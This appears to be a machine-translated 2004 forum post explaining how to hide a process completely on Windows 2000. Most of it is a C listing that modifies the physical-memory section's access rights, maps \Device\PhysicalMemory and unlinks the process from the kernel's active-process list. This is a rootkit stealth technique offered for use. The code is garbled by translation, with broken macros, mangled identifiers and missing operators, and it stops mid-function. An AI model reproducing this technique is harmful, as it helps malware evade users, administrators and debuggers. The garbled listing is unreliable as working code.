A solution hidden under Win2000 process


A solution hidden under Win2000 process

【Key words: Win2000 Process hidden program entry: Zeng Source: huiyun.net Time: 2004-2-20 18:44:12 Click: 60 times

I mentioned this the last time and, because it is so simple, felt there was nothing worth saying about it; since some people asked me to write it up, here are a few more words. Many posts already analyze techniques such as API hooks and system service hooks; thread injection has no process of its own, so that is not "hiding" in the sense meant here. What follows is a method of hiding a process completely under 2000; it is very simple and contains no new idea. Before the explanation, a note on some structures: the process executive block holds several process-related linked lists, one of which is the active process list. One important role of this list is to enumerate the currently active processes when system information is queried. Interestingly, M$ (perhaps for efficiency reasons) does not consult it from the process kernel block, which means thread switching does not go through it; it is further said that removing an entry from it therefore causes no noticeable problem (this is the basis of this program). How to do it is then obvious: unlink the process you want to hide from the doubly-linked active process list, and neither user-mode tools nor a kernel debugger (such as SoftICE / Proc) can find it.

The code for hiding the current process under 2000 is as follows: #include #include #include #define nt_success (status) (status) (status) (status)> = 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK {NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; pvoid securityDescriptor; pvoid securityQualityofservice;} Object_attributes, * pobject_attributes; typedef ntstatus (callback * zwopens ECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; BOOL InitNTDLL () {g_hNtDLL = LoadLibrary ( "ntdll.dll"); if (! g_hNtDLL) {return FALSE;} RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, tlInitUnicodeString "); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hntdll, "zwopensection"); return true;} void closentdll () {if (g_hntdll! =

NULL) {FreeLibrary (g_hNtDLL);}} VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, ! NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee .TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = ! SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp: if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} HANDLE OpenPhysicalMemory () {NTSTATUS Status; unicode_string physmemstring; object_attributes attributes; rt lInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes. SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZWOPENSECTION (&)

(! NT_SUCCESS (status); | g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4,0,0x30000,0x1000); if (g_pMapPhysicalMemory == NULL) {return NULL;} Return g_hmpm;} Pvoid ​​LineTDRPHYS (Pulong Baseaddress, Pvoid ​​Addr) {Ulong Vaddr = (Ulong) Addr, PGDE, PTE, Paddr; PGDE = BaseAddress [VADDR >> 22]; IF ((PGDE & 1)! = 0) {ulong TMP = PGDE & 0x00000080; if (tmp = 0!) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG) PGDE) [(VADDR & 0x003FF000) >> 12]; IF ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFF000) (VADDR & 0x00000FFF); UnmapViewOffile (PVOID) PGDE);} else return 0;}} else return 0; return (PVOID) PAddr;} ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000 , 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} bool setdata (pvoid addr, ulong data) {Ulong Phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) return FALSE; tmp [ (PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); return true;} Bool HideProcessatall () {if (initntdll ()) {ix (OpenPhysicalMemory () == 0) {Return False;} ulong thread = GetData (PVOID) 0xffdff124); ulong process = getData (PVOID (Thread 0x22C)); Ulong FW = getData (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4)); setData (PVOID) FW 4), BW); SetData (PVOID (BW), FW);

